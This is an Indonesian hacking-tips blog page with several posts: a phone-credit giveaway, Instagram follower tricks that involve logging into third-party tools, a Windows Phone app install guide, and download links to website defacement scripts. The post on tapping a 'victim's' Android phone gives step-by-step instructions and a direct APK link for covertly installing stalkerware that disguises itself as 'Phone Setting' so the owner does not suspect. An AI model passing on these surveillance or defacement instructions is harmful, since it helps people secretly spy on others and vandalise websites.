Skip to main content

Posts

Trik seputar Facebook

Recent posts

Bagi Bagi pulsa

EVENT +++HARISSHARRE+++
Rp5000 LINK 1LINK 2
Rp10rb LINK 1LINK 2
Rp15rb LINK1LINK2+++Cara nya+++
-Pilih salah satu link diatas
-anda akan di alihkan di google play store
-install app nya
-Daftarkan nomor dan verifikasi
-sekarang ke telepon
-Tambah kontak
-Tambah nomor 089620032037
-MASUK netzme dan Chat Harisgitama
-pesan chat nya "KIRIM PULSA Rp5000"
(Tanpa tanda kutip)
+++Selesai+++
(5000 itu sesuai link yg kalian download tadi)

Sekian Thankz

Cara menyadap aktivitas di hp korban|HariSShare

Inilah Cara Menyadap HP Android Menggunakan SmartphonelogsUnduh dan pasangDownload aplikasi smartphonelogs pada laman resminya di internet atau lewat link http://www.mediafire.com/file/dtkcmdnjphdln0q/app5.apk (versi 5). Karena proses pengunduhannya tidak menggunakan play store, maka ada beberapa hal yang perlu Anda lakukan terlebih dahulu. Ketika aplikasi di buka, Anda akan di arahkan pada pengaturan Aplikasi yang Terblokir. Klik saja tanda centang pada opsi unknown sources atau sumber tidak diketahui. Ingat, aplikasi ini diunduh dan dipasang pada ponsel yang akan disadap. Ukuran filnya juga kecil yaitu hanya sebesar 1,43 MB. Korban yang disadap tidak akan curiga karena aplikasi smartphonelogs yang diinstal akan berubah namanya menjadi Phone Setting/Phone Backup. Namanya diubah agar pemilik ponsel tidak mencurigai bahwa ponselnya sedang dipantau.buka website smartphonelogsdownload and install nowpasang aplikasi di android andaPengaturanCara menyadap hp android menggunakan smartphonel…

Cara MENAMBAH FOLLOWERS gratisan | Harissharre

Yups gan
Kali ini harissharre akan berbagi trik cara mendapatkan followers gratis/tanpa membayar..
Trik ini sudah di izinkan kan oleh pihak instagram dan tidak akan merusak ig anda
Trik #1
Follow akun FOLLGRAMCO.ID
Jika sudah di follow, follow juga yg akun itu ikuti...
Tunggu sampai 1-5 menit follow akan bertambah..
Trik #2
Masuk tools DISINI
Login dengan akun ig kalian..
Lalu klik tambah followers
Lalu otomatis akan terfollow akun kalian
Trik #3
Masuk ke INSTAGRAM
Follow dan unfollow Terus akun nya berulang ulang kali
Followers akan bertambah..
Hanya segitu yg saya tau,Sekian Dan thanks..
#SEEBARKAN_TRIK_INI_YA
#PALING_AMPUH_TRIK_#1
Halo guys kali ini saya akan berbagi aplikasi panel ig..
Cukup mudah..
Kalian hanya login dengan akun kalian Dan pilih followers yg akan dikirim.. |DOWNLOAD|

cara pasang appx di windows phone/Lumia

How are you bro? Ketemu lagi dengan saya...
Yups kali ini Kita belajar Cara pasang appx di windows phone 8.1
Simak Cara berikut ya ...




1.siapkan aplikasi nya yg Mau di pasang(Berextensi appx)
2.Masuk Bursa...
3.tekan ... <= titik tiga dibagian kanan bawah
4.tekan pasang aplikasi lokal 5.centang,dan pasang app yg ingin di instal
Note :Aplikasi nya di taruh di kartu sd


Semoga berhasil ya.. User Lumia 532 mana suaranya??? Vvvvv

Script deface ala harissharre

Nih guys gw ada script deface untuk hacker hacker noob/hacker yg males ribet
Udah gw siapin
Deface 1
|Download||Mirror|
Deface 2
|Download||Mirror|
Ingat gambar nya kalian edit sendiri..
Atau upload gambar nya ke SINI
Sekian Thanks..
Komentar kalo bingung